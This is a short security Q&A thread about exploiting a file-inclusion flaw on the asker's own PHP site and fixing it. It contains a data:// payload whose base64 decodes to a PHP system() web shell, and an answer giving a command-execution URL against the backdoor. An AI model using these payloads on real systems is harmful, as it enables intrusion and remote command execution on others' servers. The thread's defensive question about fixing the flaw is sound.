# LFI exploitation using data://

Tags: web-application, xss, exploit-development

I found LFI in my website and I tried to exploit it, but when I use php://input or data:// it doesn't work, I cannot get the shell.

Example: `.index.php?lang=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls -l`

I have found `<?system($_GET['x']);?>` printed in the source code of page (ctrl+f)

1. How can I exploit it?
2. How can I fix it?

Comment: As it is now, it is unclear what you are asking. Are you talking about your very own website where you've found this code (as opposed to some hacking test site)? What do you put exactly behind the "LFI" acronym? Are you sure you don't mix it with remote PHP code injection as it appear with you `system()` code snippet?

Comment: it's my own website, and I Founded RFI* but <?system($_GET['x']);?>
this sounds like a backdoor, how I can bypass this and get the shell?

Answer (score 1):

```
<?system($_GET['x']);?>
```

This sounds like a backdoor in your application (Remote Command Execution, not File Inclusion)!

To exploit it - Try:
index.php?x=ifconfig 2>&1

To fix it - Remove it.